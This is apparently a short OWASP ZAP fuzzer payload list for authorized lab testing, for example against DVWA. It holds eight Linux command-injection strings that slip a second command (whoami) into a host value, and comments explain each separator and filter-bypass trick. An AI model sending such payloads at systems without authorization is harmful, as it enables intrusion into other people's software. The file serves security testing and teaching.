# ============================================================================
# OWASP ZAP FUZZER PAYLOAD LIST
# Tool    : Command Injection Pattern Generator
# Author  : Offensive Team Zeta - ITSOLERA (PVT) LTD
# Created : 2026-02-20 18:30:04
# Target  : LINUX OS patterns
# Usage   : ZAP > Fuzzer > Payloads > Add > File > (this file)
# Mode    : Offline testing on authorized lab (e.g. DVWA) only
# WARNING : Use ONLY on authorized targets with written permission
# NOTE    : These are NON-EXECUTABLE string templates only
# ============================================================================

# HOW TO USE IN OWASP ZAP:
#   1. Start ZAP → Manual Explore → browse to localhost/DVWA
#   2. Find the target request in the History tab
#   3. Right-click the request → Attack → Fuzz
#   4. In the Fuzz dialog, highlight the injection point
#   5. Payloads → Add → Type: File → select this file
#   6. Click Start Fuzzer (authorized lab / DVWA ONLY)

# ============================================================================
# LINUX INJECTION PATTERNS
# ============================================================================
# [Separator: ;] Semicolon separator — runs second command unconditionally
127.0.0.1 ; whoami
# [Separator: &&] AND operator — runs second command only if first succeeds (exit 0)
127.0.0.1 && whoami
# [Separator: ||] OR operator — runs second command only if first fails (non-zero exit)
invalid_host || whoami
# [Separator: |] Pipe — output of first command is stdin of second
127.0.0.1 | whoami
# [Separator: `] Backtick substitution — executes and substitutes command output inline
127.0.0.1 `whoami`
# [Separator: $(] Dollar-paren substitution — POSIX alternative to backticks, nestable
127.0.0.1 $(whoami)
# [Separator: %0A] URL-encoded newline — shell interprets newline as command separator
127.0.0.1%0Awhoami
# [Separator: ${IFS}] Internal Field Separator abuse — replaces spaces to bypass space filters
127.0.0.1;${IFS}whoami

